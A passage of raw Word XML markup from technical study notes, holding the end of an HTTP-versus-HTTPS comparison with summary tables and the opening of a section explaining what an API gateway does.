              <w:t>Any authentication/authorization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BCF53C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Tokens/passwords in plaintext = instant compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="12E5FE2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A5BB3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Any personal data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0CAA17" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Legal requirements (GDPR, HIPAA, PCI-DSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="392D872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544184" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Any e-commerce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621787" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Payment card data must be encrypted (PCI-DSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="44746A1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A7FA8E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Any API handling sensitive data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43E351" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Even internal APIs in zero-trust architectures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="6ACA055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1637F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Mobile app backends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6DC923" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>App store requirements + pinning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2DFA6DC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3C2C07" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Required for HTTP/2 and HTTP/3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71FCC2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Browsers only support encrypted HTTP/2+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0FCBB09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513F54" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Service-to-service (microservices)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F77EE3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>mTLS for zero-trust internal security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="144280E0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="74423F67">
          <v:rect id="_x0000_i3995" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656DA0E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>22. Summary — The Complete Mental Model</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990"/>
        <w:gridCol w:w="2906"/>
        <w:gridCol w:w="3454"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="526CD01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F82C44" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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C71D19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP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B40D3D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3BC92AB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784180" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Confidentiality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758CFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None — all plaintext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AE964E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Full — AES-256 encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1581EB8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789C67" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:lastRenderedPageBreak/>
              <w:t>Integrity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14E0CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None — modifiable in transit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00F9F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Full — HMAC on every record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="504DB18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360E89" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Authentication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D86BD9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None — no server identity proof</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AE21A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Server certificate verifies identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="72779E3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A041D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Performance (cold)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09A420" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (TCP only)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EA381D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2 RTT (TCP + TLS 1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="7361219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FE1446" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Performance (warm)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5CAF5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Same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BFD527" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Negligible difference (session resume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="73E0987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538C54" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP/2 support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3B5BF0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>No (in browsers)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42F5E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="16773A0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456572" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP/3 support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518F06" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>No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E88D09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes (built into QUIC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="6A23BAF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FB163B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Proxy caching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90CBE6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes (transparent caches work)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EAF0C6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>No (content opaque to intermediaries)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="021DC3B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C76F50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>SEO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064002" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Penalized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D24E97" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Preferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="01A43B7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EAC4B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Browser trust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89438D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>"Not Secure" warning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F14300" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Padlock / trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="645761C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8AA76A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Modern APIs (camera, geo, SW)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455D29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Blocked by browsers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13B018" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="31C0A12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4EAB05" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Operational overhead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039A3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None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40CB35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Certificate management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45F3E48F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental truth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3894180B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP is a protocol designed for a trusted network that no longer exists. HTTPS transforms an untrusted network (the Internet) into a secure channel between two authenticated endpoints. The question is no longer "should I use HTTPS?" — it's "is there any legitimate reason NOT to use HTTPS?" And the answer is almost always no.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1C09D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRDefault="006E6644" w:rsidP="006F072B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503B19CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRDefault="006E6644" w:rsidP="006F072B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4358C7C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006F072B" w:rsidRDefault="006E6644" w:rsidP="006F072B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637C3F22" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Gateway — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308EF184" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="055D79A2">
          <v:rect id="_x0000_i3823" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D41996" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What an API Gateway Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E67804" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>An API Gateway is not simply a "front door to your microservices." That definition obscures what it actually does and why it exists. An API Gateway is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>specialized reverse proxy that implements cross-cutting concerns for API traffic at the network boundary</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — concerns that would otherwise need to be duplicated in every service: authentication, authorization, rate limiting, request routing, protocol translation, observability, and transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41971A47" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The engineering problem it solves is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cross-cutting concern explosion</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> in microservices architectures. Without an API gateway, every service must independently implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7F40D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Authentication (validate JWT tokens, verify API keys, call identity providers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA83E4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Rate limiting (track per-client request rates, enforce quotas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562B49F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Observability (log every request, emit metrics, propagate trace context).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7F5BA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>TLS termination (manage certificates, handle cipher negotiation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5AC2BA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
